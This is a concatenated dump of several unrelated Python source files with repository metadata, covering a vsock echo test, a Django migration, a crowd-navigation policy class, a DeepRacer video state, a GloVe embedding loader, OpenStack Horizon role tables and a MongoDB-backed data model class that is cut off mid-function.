`TEST_CONNECTION_COUNT` `HostEchoWorker` threads.
After the workers are done transferring the data read from `blob_path`,
the hashes they computed for the data echoed back by the server are
checked against `blob_hash`.
"""
conn = SSHConnection(vm.ssh_config)
cmd = "vsock_helper echosrv -d {}". format(ECHO_SERVER_PORT)
ecode, _, _ = conn.execute_command(cmd)
assert ecode == 0
workers = []
for _ in range(TEST_CONNECTION_COUNT):
worker = HostEchoWorker(uds_path, blob_path)
workers.append(worker)
worker.start()
for wrk in workers:
wrk.join()
for wrk in workers:
assert wrk.hash == blob_hash
def check_guest_connections(vm, server_port_path, blob_path, blob_hash):
"""Test guest-initiated connections.
This will start an echo server on the host (in its own thread), then
start `TEST_CONNECTION_COUNT` workers inside the guest VM, all
communicating with the echo server.
"""
echo_server = HostEchoServer(vm, server_port_path)
echo_server.start()
conn = SSHConnection(vm.ssh_config)
# Increase maximum process count for the ssh service.
# Avoids: "bash: fork: retry: Resource temporarily unavailable"
# Needed to execute the bash script that tests for concurrent
# vsock guest initiated connections.
ecode, _, _ = conn.execute_command("echo 1024 > \
/sys/fs/cgroup/pids/system.slice/ssh.service/pids.max")
assert ecode == 0, "Unable to set max process count for guest ssh service."
# Build the guest worker sub-command.
# `vsock_helper` will read the blob file from STDIN and send the echo
# server response to STDOUT. This response is then hashed, and the
# hash is compared against `blob_hash` (computed on the host). This
# comparison sets the exit status of the worker command.
worker_cmd = "hash=$("
worker_cmd += "cat {}".format(blob_path)
worker_cmd += " | vsock_helper echo 2 {}".format(ECHO_SERVER_PORT)
worker_cmd += " | md5sum | cut -f1 -d\\ "
worker_cmd += ")"
worker_cmd += " && [[ \"$hash\" = \"{}\" ]]".format(blob_hash)
# Run `TEST_CONNECTION_COUNT` concurrent workers, using the above
# worker sub-command.
# If any worker fails, this command will fail. If all worker sub-commands
# succeed, this will also succeed.
cmd = "workers=\"\";"
cmd += "for i in $(seq 1 {}); do".format(TEST_CONNECTION_COUNT)
cmd += " ({})& ".format(worker_cmd)
cmd += " workers=\"$workers $!\";"
cmd += "done;"
cmd += "for w in $workers; do wait $w || exit -1; done"
ecode, _, _ = conn.execute_command(cmd)
echo_server.exit()
assert echo_server.error is None
assert ecode == 0, ecode
def _vsock_connect_to_guest(uds_path, port):
"""Return a Unix socket, connected to the guest vsock port `port`."""
sock = socket(AF_UNIX, SOCK_STREAM)
sock.connect(uds_path)
buf = bytearray("CONNECT {}\n".format(port).encode("utf-8"))
sock.send(buf)
ack_buf = sock.recv(32)
assert re.match("^OK [0-9]+\n$", ack_buf.decode('utf-8')) is not None
return sock
| 32.721569 | 79 | 0.618768 |
ace9516ddd579f4c20c8a251e499e70a3c670453 | 628 | py | Python | typeidea/blog/migrations/0006_auto_20181021_0326.py | xugl/typeidea | 00f96d923007efda77deec506f4c3e449254537e | [
"MIT"
] | null | null | null | typeidea/blog/migrations/0006_auto_20181021_0326.py | xugl/typeidea | 00f96d923007efda77deec506f4c3e449254537e | [
"MIT"
] | null | null | null | typeidea/blog/migrations/0006_auto_20181021_0326.py | xugl/typeidea | 00f96d923007efda77deec506f4c3e449254537e | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2018-10-20 19:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_post_html'),
]
operations = [
migrations.AddField(
model_name='post',
name='pv',
field=models.PositiveIntegerField(default=0, verbose_name='pv'),
),
migrations.AddField(
model_name='post',
name='uv',
field=models.PositiveIntegerField(default=0, verbose_name='uv'),
),
]
| 24.153846 | 76 | 0.589172 |
ace9523d91d23b35dfd5c7441551b717ecae4d4b | 1,151 | py | Python | crowd_sim/envs/policy/policy.py | longhuang318/CrowdNav | 6c5c394979c968d78836e1db6d86c29992ae0b75 | [
"MIT"
] | 372 | 2018-09-27T12:57:22.000Z | 2022-03-27T13:56:24.000Z | crowd_sim/envs/policy/policy.py | longhuang318/CrowdNav | 6c5c394979c968d78836e1db6d86c29992ae0b75 | [
"MIT"
] | 44 | 2018-10-01T07:11:08.000Z | 2022-01-27T22:19:31.000Z | crowd_sim/envs/policy/policy.py | longhuang318/CrowdNav | 6c5c394979c968d78836e1db6d86c29992ae0b75 | [
"MIT"
] | 135 | 2018-10-28T03:45:12.000Z | 2022-03-30T13:57:23.000Z | import abc
import numpy as np
class Policy(object):
def __init__(self):
"""
Base class for all policies, has an abstract method predict().
"""
self.trainable = False
self.phase = None
self.model = None
self.device = None
self.last_state = None
self.time_step = None
# if agent is assumed to know the dynamics of real world
self.env = None
@abc.abstractmethod
def configure(self, config):
return
def set_phase(self, phase):
self.phase = phase
def set_device(self, device):
self.device = device
def set_env(self, env):
self.env = env
def get_model(self):
return self.model
@abc.abstractmethod
def predict(self, state):
"""
Policy takes state as input and output an action
"""
return
@staticmethod
def reach_destination(state):
self_state = state.self_state
if np.linalg.norm((self_state.py - self_state.gy, self_state.px - self_state.gx)) < self_state.radius:
return True
else:
return False
| 23.02 | 110 | 0.588184 |
ace95252a57ecc6fcae4abea30803600fd9750bb | 4,415 | py | Python | bundle/deepracer_simulation_environment/lib/python2.7/dist-packages/mp4_saving/states/virtual_event_prepare_state.py | larsll/deepracer-simapp | 9251c32ff33d49955b63ccca4f38d01a0c721d4f | [
"MIT"
] | 1 | 2022-02-23T20:34:00.000Z | 2022-02-23T20:34:00.000Z | bundle/deepracer_simulation_environment/lib/python2.7/dist-packages/mp4_saving/states/virtual_event_prepare_state.py | Bandwidth/deepracer-simapp | 9bf0a5f9c55e37ecef8e72b1b6dc15ecb0370bc1 | [
"MIT"
] | null | null | null | bundle/deepracer_simulation_environment/lib/python2.7/dist-packages/mp4_saving/states/virtual_event_prepare_state.py | Bandwidth/deepracer-simapp | 9bf0a5f9c55e37ecef8e72b1b6dc15ecb0370bc1 | [
"MIT"
] | null | null | null | """this module implements all virtual event state machine states"""
import time
import logging
import cv2
from markov.log_handler.logger import Logger
from markov.metrics.constants import EpisodeStatus
from markov.state_machine.abs_fsm_state import AbsFSMState
from markov.virtual_event.constants import (PAUSE_TIME_BEFORE_START,
WAIT_TOTAL_EVAL_SECONDS,
WAIT_SPEED,
PAUSE_TIME_AFTER_FINISH,
WAIT_DISPLAY_NAME,
WAIT_CURRENT_LAP,
WAIT_RESET_COUNTER)
from mp4_saving import utils
from mp4_saving.constants import (IconographicImageSize,
TrackAssetsIconographicPngs, RACE_COMPLETE_Y_OFFSET,
Mp4Parameter, VIRTUAL_EVENT_PREPARE_DIGIT_FONT,
RaceCarColorToRGB, VirtualEventMP4Params,
VirtualEventXYPixelLoc,
VirtualEventIconographicPngs)
LOG = Logger(__name__, logging.INFO).get_logger()
class VirtualEventPrepareState(AbsFSMState):
"""Virtual Event Prepare State
In the Prepare state, racecar will count down 3, 2, ... 0
"""
def __init__(self):
"""initialize Prepare state with digit to display
"""
LOG.info("[virtual event]: video edit state at {}".format(self))
self._digit = int(PAUSE_TIME_BEFORE_START)
self._amazon_ember_heavy_100px = utils.get_font('AmazonEmber-Heavy', 100)
frame_x, frame_y = Mp4Parameter.FRAME_SIZE.value
self._loc_x, self._loc_y = (frame_x - VIRTUAL_EVENT_PREPARE_DIGIT_FONT // 2) // 2, \
(frame_y - VIRTUAL_EVENT_PREPARE_DIGIT_FONT) // 2
self._icon_image = utils.get_image(VirtualEventIconographicPngs.SET.value)
self._icon_image = cv2.cvtColor(self._icon_image, cv2.COLOR_RGBA2BGRA)
def _execute(self, input_val):
"""Virtual Event state machine on event call
Args:
input_val (dict): input value dictionary
Returns:
self or VirtualEventRunState: self or next state that will transit to based on event
"""
event, info_dict = input_val['event'], input_val['info_dict']
major_cv_image = info_dict[VirtualEventMP4Params.MAJOR_CV_IMAGE.value]
# During the prepare phase, for smooth transition we would like to fade out the camera image
# (Darker to Brighter image).
fader_obj = info_dict[VirtualEventMP4Params.FADER_OBJ.value]
major_cv_image = fader_obj.fade_out(major_cv_image)
if event == EpisodeStatus.PREPARE.value:
# get params from info_dict
countdown_timer = info_dict['countdown_timer']
# display countdown digits
if 0 < countdown_timer <= self._digit - 1:
self._digit -= 1
# write SET icon
icon_x, icon_y = VirtualEventXYPixelLoc.ICON.value
major_cv_image = utils.plot_rectangular_image_on_main_image(
major_cv_image, self._icon_image, (icon_x, icon_y))
# write count down digit
countdown_digit = "{}".format(self._digit)
major_cv_image = utils.write_text_on_image(image=major_cv_image, text=countdown_digit,
loc=(self._loc_x, self._loc_y),
font=self._amazon_ember_heavy_100px,
font_color=RaceCarColorToRGB.White.value,
font_shadow_color=RaceCarColorToRGB.Black.value)
# update info dict
info_dict[VirtualEventMP4Params.MAJOR_CV_IMAGE.value] = major_cv_image
info_dict[VirtualEventMP4Params.TOTAL_EVAL_SECONDS.value] = WAIT_TOTAL_EVAL_SECONDS
info_dict[VirtualEventMP4Params.SPEED.value] = WAIT_SPEED
# stay at PREPARE state
return self, info_dict
# import in method to prevent circualr dependecy
from mp4_saving.states.virtual_event_run_state import VirtualEventRunState
# transit to RUN state
return VirtualEventRunState(current_sector=0), info_dict
| 49.606742 | 103 | 0.614043 |
ace9527c2c6eed5c8bfdffc3a880cf5c45101c8f | 3,709 | py | Python | SentEval/words/embeddings.py | comRamona/Neural-Statistician | 7ff41fdf97e0e4ca3a335901d107f6de0edb5481 | [
"Unlicense"
] | 3 | 2019-03-06T18:45:09.000Z | 2022-03-10T19:11:18.000Z | SentEval/words/embeddings.py | comRamona/Neural-Statistician | 7ff41fdf97e0e4ca3a335901d107f6de0edb5481 | [
"Unlicense"
] | null | null | null | SentEval/words/embeddings.py | comRamona/Neural-Statistician | 7ff41fdf97e0e4ca3a335901d107f6de0edb5481 | [
"Unlicense"
] | 2 | 2020-06-23T09:05:37.000Z | 2022-02-25T08:39:43.000Z | from collections import Counter
from zipfile import ZipFile
from tqdm import tqdm
import random as rn
import os
import requests
import os
import sys
from urllib.request import urlretrieve
import numpy as np
from nltk import word_tokenize
#import pdb
import logging
logging.basicConfig(
format='%(asctime)s %(levelname)-8s %(message)s',
level=logging.DEBUG,
datefmt='%Y-%m-%d %H:%M:%S',
filename='bookNS2.log')
class GloveMatrix(object):
"""
Downloads and loads GloVe matrix.
"""
#https://nlp.stanford.edu/data/glove.840B.300d.zip
def __init__(self):
self.glove_url = "http://nlp.stanford.edu/data/glove.840B.300d.zip"
self.file_name = "/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d.zip"
self.dest = "/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d"
self.download_glove()
embedding_index = self.load_matrix()
self.EMBEDDING_DIM = 300
print("Done")
logging.debug("Done")
def download_glove(self):
if not os.path.exists("/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d/glove.840B.300d.txt"):
if os.path.exists(self.file_name):
self.unzip_file(self.file_name, self.dest)
else:
urlretrieve(self.glove_url, self.file_name, self.reporthook)
self.unzip_file(self.file_name, self.dest)
def load_matrix(self):
print("Loading embedding matrix")
logging.debug("Loading embedding matrix")
self.embedding_index = {}
with open('/homes/rgc35/Desktop/neural-statistician/SentEval/glove.840B.300d/glove.840B.300d.txt', "r") as f:
lines = f.read().split("\n")
for line in lines:
values = line.split()
if len(values) > 1:
#pdb.set_trace()
try:
word = values[0]
coefs = np.asarray(values[1:], dtype='float32')
self.embedding_index[word] = coefs
except Exception as e:
pass
def get_index(self):
return self.embedding_index
def unzip_file(self, file_name, dest):
print("Unzipping file...")
zipTest = ZipFile(file_name)
zipTest.extractall(dest)
def download_file(self, url, file_name):
print("Downloading file...")
urlretriseve(url, file_name, reporthook)
def reporthook(self, blocknum, blocksize, totalsize):
readsofar = blocknum * blocksize
if totalsize > 0:
percent = readsofar * 1e2 / totalsize
s = "\r%5.1f%% %*d / %d" % (
percent, len(str(totalsize)), readsofar, totalsize)
sys.stderr.write(s)
if readsofar >= totalsize: # near the end
sys.stderr.write("\n")
else: # total size is unknown
sys.stderr.write("read %d\n" % (readsofar,))
class TextEmbedder(object):
"""
TextEmbedder returning word embeddings, using given GloVe matrix.
"""
def __init__(self, glove_matrix):
self.embedding_index = glove_matrix.embedding_index
def get_any(self,word):
return self.embedding_index.get(word, np.zeros(0)).astype(np.float32)
def get_zero(self):
return np.zeros(300).astype(np.float32)
def get_sentence_embedding(self, sent, sent_length = 40):
sent_vec = np.zeros((sent_length, 300))
embs = [self.embedding_index.get(word, self.get_zero()) for word in sent[:sent_length]]
sent_vec[:len(embs),:] = np.array(embs)
return sent_vec | 37.09 | 119 | 0.607711 |
ace953d271ad8a0036daa82c40d575b729c346d5 | 2,440 | py | Python | openstack_dashboard/dashboards/admin/roles/tables.py | Juniper/horizon | aa0b50beb4f68289cad4193f699156a77b2a0aa3 | [
"Apache-2.0"
] | null | null | null | openstack_dashboard/dashboards/admin/roles/tables.py | Juniper/horizon | aa0b50beb4f68289cad4193f699156a77b2a0aa3 | [
"Apache-2.0"
] | null | null | null | openstack_dashboard/dashboards/admin/roles/tables.py | Juniper/horizon | aa0b50beb4f68289cad4193f699156a77b2a0aa3 | [
"Apache-2.0"
] | 4 | 2015-05-05T08:17:28.000Z | 2020-02-05T10:47:06.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import tables
from openstack_dashboard import api
class CreateRoleLink(tables.LinkAction):
name = "create"
verbose_name = _("Create Role")
url = "horizon:admin:roles:create"
classes = ("ajax-modal", "btn-create")
policy_rules = (("identity", "identity:create_role"),)
def allowed(self, request, role):
return api.keystone.keystone_can_edit_role()
class EditRoleLink(tables.LinkAction):
name = "edit"
verbose_name = _("Edit")
url = "horizon:admin:roles:update"
classes = ("ajax-modal", "btn-edit")
policy_rules = (("identity", "identity:update_role"),)
def allowed(self, request, role):
return api.keystone.keystone_can_edit_role()
class DeleteRolesAction(tables.DeleteAction):
data_type_singular = _("Role")
data_type_plural = _("Roles")
policy_rules = (("identity", "identity:delete_role"),)
def allowed(self, request, role):
return api.keystone.keystone_can_edit_role()
def delete(self, request, obj_id):
api.keystone.role_delete(request, obj_id)
class RoleFilterAction(tables.FilterAction):
def filter(self, table, roles, filter_string):
"""Naive case-insensitive search."""
q = filter_string.lower()
return [role for role in roles
if q in role.name.lower()]
class RolesTable(tables.DataTable):
name = tables.Column('name', verbose_name=_('Role Name'))
id = tables.Column('id', verbose_name=_('Role ID'))
class Meta:
name = "roles"
verbose_name = _("Roles")
row_actions = (EditRoleLink, DeleteRolesAction)
table_actions = (RoleFilterAction, CreateRoleLink, DeleteRolesAction)
| 32.533333 | 78 | 0.692213 |
ace953d9386ccd8e573dde5385215f5df4f42078 | 22,849 | py | Python | backend/ozon/core/ModelData.py | libremente/service-app | 3cc710d2d91ca61c9f628dd023326c16cf934c51 | [
"MIT"
] | null | null | null | backend/ozon/core/ModelData.py | libremente/service-app | 3cc710d2d91ca61c9f628dd023326c16cf934c51 | [
"MIT"
] | null | null | null | backend/ozon/core/ModelData.py | libremente/service-app | 3cc710d2d91ca61c9f628dd023326c16cf934c51 | [
"MIT"
] | null | null | null | # Copyright INRIM (https://www.inrim.eu)
# See LICENSE file for full licensing details.
import sys
import os
import logging
import pymongo
import ujson
import pydantic
from .database.mongo_core import *
from .BaseClass import PluginBase
from .QueryEngine import QueryEngine
from fastapi.exceptions import HTTPException
logger = logging.getLogger(__name__)
class ModelData(PluginBase):
plugins = []
def __init_subclass__(cls, **kwargs):
cls.plugins.append(cls())
class ModelDataBase(ModelData):
@classmethod
def create(cls, session, pwd_context, app_code=""):
self = ModelDataBase()
self.init(session, pwd_context, app_code)
return self
def init(self, session, pwd_context, app_code=""):
self.session = session
self.pwd_context = pwd_context
self.app_code = app_code
self.qe = QueryEngine.new(session=session, app_code=app_code)
self.no_clone_field_keys = {}
self.computed_fields = {}
self.create_task_action = {}
self.unique_fields = []
self.sort_dir = {
"asc": 1,
"desc": -1
}
self.asc = 1
self.desc = -1
self.system_model = {
"component": Component,
"session": Session,
"attachment_trash": AttachmentTrash
}
def eval_sort_str(self, sortstr):
sort_rules = sortstr.split(",")
sort = []
for rule_str in sort_rules:
rule_list = rule_str.split(":")
logger.info(rule_list)
if len(rule_list) > 1:
rule = (rule_list[0], self.sort_dir[rule_list[1]])
sort.append(rule)
return sort
async def make_settings(self):
self.app_settings = await self.get_app_settings(app_code=self.app_code)
async def gen_model(self, model_name):
model = False
if model_name in self.system_model:
model = self.system_model.get(model_name)
else:
component = await search_by_name(Component, model_name)
if component:
mm = ModelMaker(
model_name, component.components)
for field in mm.unique_fields:
await set_unique(mm.model, field)
self.no_clone_field_keys = mm.no_clone_field_keys
self.computed_fields = mm.computed_fields
self.create_task_action = mm.create_task_action
model = mm.model
return model
def clean_data_to_clone(self, data: dict):
for k, v in self.no_clone_field_keys.items():
if k in data and not k == "rec_name":
data[k] = v
if data.get("data_value") and data.get("data_value").get(k):
data.get("data_value")[k] = v
return data.copy()
async def get_app_settings(self, app_code: str):
logger.debug(f"app_code: {app_code}")
self.app_settings = await self.by_name("settings", app_code)
return self.app_settings
async def all(self, schema: Type[ModelType], sort=[], distinct=""):
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
if not sort:
#
sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
return await search_all(schema, sort=sort)
async def all_distinct(
self, schema: Type[ModelType], distinct, query={}, additional_key=[], compute_label=""):
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
querye = await self.qe.default_query(schema, query)
list_data = await search_all_distinct(schema, distinct=distinct, query=querye, compute_label=compute_label)
return get_data_list(list_data, additional_key=additional_key)
async def freq_for_all_by_field_value(
self, schema: Type[ModelType], field, field_query, min_occurence=2, add_fields="", sort=-1,
additional_key=[]
):
list_data = await search_count_field_value_freq(
schema, field=field, field_query=field_query, min_occurence=min_occurence, add_fields=add_fields, sort=sort)
return get_data_list(list_data, additional_key=additional_key)
async def by_name(self, model, record_name):
model_obj = model
if isinstance(model, str):
model_obj = await self.gen_model(model)
return await search_by_name(model_obj, record_name)
async def by_name_raw(self, model, record_name):
if isinstance(model, BasicModel):
model = model.str_name()
return await search_by_name_raw(model, record_name)
async def user_by_token(self, token):
return await search_user_by_token(User, token)
async def by_uid(self, model, uid):
return await search_by_uid(model, uid)
async def component_by_name(self, model_name):
return await search_by_name(Component, model_name)
async def component_by_type(self, model_type):
lst = await search_by_type(Component, model_type=model_type)
return get_bj_list_data(Component, lst)
async def component_distinct_model(self):
return await search_distinct(Component)
async def search_base(
self, data_model: Type[ModelType], query={}, parent="", sort=[],
limit=0, skip=0, use_aggregate=False):
"""
"""
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
"""Descending sort order."""
if not sort:
#
sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
if use_aggregate:
list_data = await aggregate(
data_model, query, sort=sort, limit=limit, skip=skip
)
else:
list_data = await search_by_filter(
data_model, query, sort=sort, limit=limit, skip=skip
)
return list_data
async def get_list_base(
self, data_model: Type[ModelType], fields=[], query={}, sort=[], limit=0, skip=0, model_type="",
parent="", merge_field="", row_action="", additional_key=[],
use_aggregate=False
):
"""
additional_key handle formio id name (workaroud):
- in form io id is defined ad '_id' but in standard mongodb id is defained 'id'
passing replace ['rec_name', '_id'] if use formio builder to link resource in form.
Before calling this method the params select sent from formio is '_id, title'
in endpoint this field be going to replaced with 'rec_name', in get_data_list if
replace is defined, adding record key '_id' with value equal 'rec_name' to send
a list data ecpected by fomiojs buider
"""
logger.debug(
f"get_list_base -> data_model:{data_model}, fields: {fields}, query:{query}, sort:{sort},"
f" model_type:{model_type}, parent:{parent}, merge_field: {merge_field}, row_action:{row_action}"
)
list_data = []
if fields:
fields = fields + default_list_metadata
return await self.search(
data_model, fields=fields, query=query, sort=sort, limit=limit, skip=skip,
merge_field=merge_field, row_action=row_action, parent=parent, additional_key=additional_key,
use_aggregate=use_aggregate
)
async def count_by_filter(self, data_model, query: Optional[Dict] = {}) -> int:
model = data_model
if not isinstance(data_model, str):
model = data_model.str_name()
return await count_by_filter(model, domain=query)
async def search(
self, data_model: Type[ModelType], fields=[], query={}, sort=[], limit=0, skip=0,
merge_field="", row_action="", parent="", additional_key=[], remove_keys=[], use_aggregate=False):
if fields:
fields = fields + default_list_metadata
list_data = await self.search_base(
data_model, query=query, parent=parent, sort=sort, limit=limit, skip=skip,
use_aggregate=use_aggregate
)
return get_data_list(
list_data, fields=fields, merge_field=merge_field,
row_action=row_action, additional_key=additional_key, remove_keys=remove_keys)
async def search_export(
self, data_model: Type[ModelType], fields=[], query={}, sort=[], limit=0, skip=0,
merge_field="", data_mode="raw", parent="", additional_key=[], remove_keys=[],
use_aggregate=False):
if fields:
fields = fields + export_list_metadata
list_data = await self.search_base(
data_model, query=query, parent=parent, sort=sort, limit=limit, skip=skip,
use_aggregate=use_aggregate
)
return get_data_list(
list_data, fields=fields, merge_field=merge_field,
remove_keys=remove_keys, additional_key=additional_key)
async def make_action_task_for_model(
self, session, model_name, component_schema, act_config={}):
logger.info(f" make_default_action_model {model_name}")
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
"""Descending sort order."""
sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
q = {"$and": [
{"model": model_name},
{"deleted": 0},
{"action_type": "save"},
{"list_query": "{}"}]}
action_model = await self.gen_model("action")
model = await self.gen_model(model_name)
list_data = await search_by_filter(
action_model, q, sort=sort, limit=0, skip=0
)
if list_data:
src_action = list_data[0]
src = src_action.dict().copy()
action = action_model(**src)
action.sys = component_schema.sys
action.model = model_name
action.list_order = await self.count_by_filter(
model, query={"deleted": 0})
action.data_value['model'] = component_schema.title
action.admin = act_config.get("admin", False)
if not action.admin:
action.user_function = "user"
if action.component_type:
action.component_type = component_schema.type
action.action_type = act_config.get("action_type", "task")
action.data_value['action_type'] = act_config.get("action_type")
action.type = act_config.get("type", "data")
action.title = f"Task {component_schema.title}"
action.data_value['title'] = f"Task {component_schema.title}"
action.rec_name = f"{model_name}_{act_config.get('rec_name')}"
action.data_value['rec_name'] = action.rec_name
await self.save_object(session, action, model_name="action", model=action_model)
async def make_default_action_model(
self, session: Session, model_name: str, component_schema: BasicModel, menu_group=False):
"""
:param session: current session Object
:param model_name: name of model
:param component_schema: name of component
:param menu_group: dict with 2 entries "rec_name" and "title"
:return: None
"""
logger.info(f" make_default_action_model {model_name}")
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
"""Descending sort order."""
sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
q = {"$and": [
{"model": "action"},
{"sys": True},
{"deleted": 0},
{"list_query": "{}"}]}
action_model = await self.gen_model("action")
menu_group_model = await self.gen_model("menu_group")
model = await self.gen_model(model_name)
list_data = await search_by_filter(
action_model, q, sort=sort, limit=0, skip=0
)
list_actions_todo = get_data_list(list_data)
logger.info(f"found {len(list_actions_todo)} action {component_schema.sys}")
group_created = False
menu_groups = await self.count_by_filter(
menu_group_model, query={"rec_name": model_name, "deleted": 0})
if (
menu_groups == 0 and not component_schema.type == 'resource'
):
if component_schema.sys:
menu = menu_group_model(
**{
"rec_name": model_name,
"label": component_schema.title,
"admin": component_schema.sys,
})
else:
menu = menu_group_model(
**{
"rec_name": model_name,
"label": component_schema.title,
"admin": component_schema.sys,
"app_code": [self.app_code]
})
group_created = True
await self.save_object(session, menu, model_name="menu_group", model=menu_group_model)
for action_tmp in list_actions_todo:
data = action_tmp.copy()
if data.get("id"):
data.pop("id")
if data.get("_id"):
data.pop("_id")
action = action_model(**data)
action.sys = component_schema.sys
action.model = model_name
action.list_order = await self.count_by_filter(model, query={"deleted": 0})
action.data_value['model'] = component_schema.title
action.admin = component_schema.sys
if not action.admin:
action.user_function = "user"
if action.component_type:
action.component_type = component_schema.type
if action.action_type == "menu":
action.title = f"{component_schema.title}"
action.data_value['title'] = f"{component_schema.title}"
action.data_value['data_model'] = model_name
if menu_group:
action.menu_group = menu_group['rec_name']
action.data_value['menu_group'] = menu_group['title']
else:
if component_schema.type == 'resource':
action.menu_group = 'risorse_app'
action.data_value['menu_group'] = "Risorse Apps"
else:
action.menu_group = model_name
action.data_value['menu_group'] = component_schema.title
action.rec_name = action.rec_name.replace("_action", f"_{model_name}")
action.data_value['rec_name'] = action.rec_name
action.next_action_name = action.next_action_name.replace("_action", f"_{model_name}")
await self.save_object(session, action, model_name="action", model=action_model)
async def save_record(self, schema, remove_meta=True):
await save_record(schema, remove_meta=remove_meta)
async def save_all(self, schema, remove_meta=True):
return await save_all(schema, remove_meta=remove_meta)
async def set_user_data(self, record):
record.owner_uid = self.session.user.get('uid')
record.owner_name = self.session.user.get('full_name', "")
record.owner_mail = self.session.user.get('mail', "")
record.owner_sector = self.session.sector
record.owner_sector_id = self.session.sector_id
record.owner_personal_type = self.session.user.get("tipo_personale", "")
record.owner_job_title = self.session.user.get("qualifica", "")
record.owner_function = self.session.function
return record
def get_password_hash(self, password):
return self.pwd_context.hash(password)
def diff(self, li1, li2):
li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2]
return li_dif
async def get_record_diff(self, session, object_o, rec_name: str = "", model_name="", copy=False):
logger.info(f"model:{model_name}, rec_name: {rec_name}, copy: {copy}")
# if not model:
# model = await self.gen_model(model_name)
to_pop = default_list_metadata_fields[:]
if rec_name:
source = await self.by_name(type(object_o), rec_name)
if not copy:
if object_o.rec_name == rec_name:
to_pop.append("rec_name")
object_o = update_model(source, object_o, pop_form_newobject=to_pop)
new_dict = object_o.get_dict()
[new_dict.pop(key) for key in to_pop]
if rec_name and source:
src_base = source.dict().copy()
[src_base.pop(key) for key in to_pop]
src_dict = src_base.copy()
set_src_l = list(src_dict.items())
set_new_l = list(new_dict.items())
dict_diff = dict(self.diff(set_src_l, set_new_l))
else:
dict_diff = new_dict.copy()
return dict_diff.copy()
async def save_object(
self, session, object_o, rec_name: str = "", model_name="",
copy=False, model=False, create_add_user=True) -> Any:
logger.debug(f" model:{model_name}, rec_name: {rec_name}, copy: {copy}")
if not model and model_name:
model = await self.gen_model(model_name)
if not model and not model_name:
model = await self.gen_model(type(object_o).str_name())
source = await self.by_name(model, object_o.rec_name)
if source:
rec_name = object_o.rec_name
if rec_name:
if not source:
source = await self.by_name(model, rec_name)
if not copy:
to_pop = default_fields[:]
object_o = update_model(source, object_o, pop_form_newobject=to_pop)
if session.user:
object_o.update_uid = session.user.get('uid')
object_o.update_datetime = datetime.now()
if not rec_name or copy:
object_o.list_order = await self.count_by_filter(model, query={"deleted": 0})
object_o.data_value['list_order'] = object_o.list_order
object_o.create_datetime = datetime.now()
if create_add_user:
object_o = await self.set_user_data(object_o)
if model_name == "user":
pw_hash = self.get_password_hash(object_o.password)
object_o.password = pw_hash
if copy:
if hasattr(object_o, "title"):
object_o.title = f"{object_o.title} Copy()"
if (
hasattr(object_o, "rec_name") and
object_o.rec_name and model_name not in object_o.rec_name
):
object_o.rec_name = f"{object_o.rec_name}_copy"
if hasattr(object_o, "data_value"):
object_o.data_value['rec_name'] = object_o.rec_name
else:
object_o.rec_name = f"{model_name}.{object_o.id}"
try:
rec = await save_record(object_o)
except pymongo.errors.DuplicateKeyError as e:
logger.error(f" Duplicate {e.details['errmsg']}")
field = e.details['keyValue']
key = list(field.keys())[0]
val = field[key]
return {
"status": "error",
"message": f"Errore Duplicato {key}: {val}",
"model": model_name
}
except pydantic.error_wrappers.ValidationError as e:
logger.error(f" Validation {e}")
return {
"status": "error",
"message": f"Errore validazione {e}",
"model": model_name
}
return rec
async def set_to_delete_record(self, data_model: Type[ModelType], record):
logger.info(f" data_model: {data_model}, record: {record.rec_name}")
return await set_to_delete_record(data_model, record)
async def set_to_delete_records(self, data_model: Type[ModelType], query={}):
logger.info(f" data_model: {data_model}, query: {query}")
return await set_to_delete_records(data_model, query=query)
async def clean_action_and_menu_group(self, model_name_to_clean):
menu_group_model = await self.gen_model("menu_group")
action_model = await self.gen_model("action")
await self.delete_records(action_model, query={"$and": [{"model": model_name_to_clean}]})
await self.delete_records(menu_group_model, query={"$and": [{"rec_name": model_name_to_clean}]})
async def delete_records(self, data_model, query={}):
logger.info(f" delete_records data_model: {data_model}, query: {query}")
cont = await self.count_by_filter(data_model, query)
if cont > 0:
return await delete_records(data_model, query=query)
return True
async def get_collections_names(self, query={}):
collections_names = await get_collections_names(query=query)
return collections_names
async def clean_expired_to_delete_record(self):
logger.info(f" clean expired to delete record ")
c_names = await self.get_collections_names()
for name in c_names:
data_model = await self.gen_model(name)
logger.info(f" clean {name} ")
if data_model:
if name == "session":
res = await clean_session(datetime.now().isoformat())
logger.info(f" clean to delete {name} {res}")
else:
res = await erese_all_to_delete_record(data_model)
logger.info(f" clean to delete {name} {res}")
return {"status": "done"}
def check_parse_json(self, str_test):
try:
str_test = ujson.loads(str_test)
except ValueError as e:
str_test = str_test.replace("'", "\"")
try:
str_test = ujson.loads(str_test)
except ValueError as e:
return False
return str_test
async def create_view(self, dbviewcfg: DbViewModel):
return await create_view(dbviewcfg)
async def search_view(
self, model_view: str, query: dict = {}, sort=[], limit=0, skip=0) -> List[Dict]:
"""
"""
ASCENDING = 1
"""Ascending sort order."""
DESCENDING = -1
"""Descending sort order."""
if not sort:
#
sort = [("list_order", ASCENDING), ("rec_name", DESCENDING)]
list_data = await raw_search_by_filter(
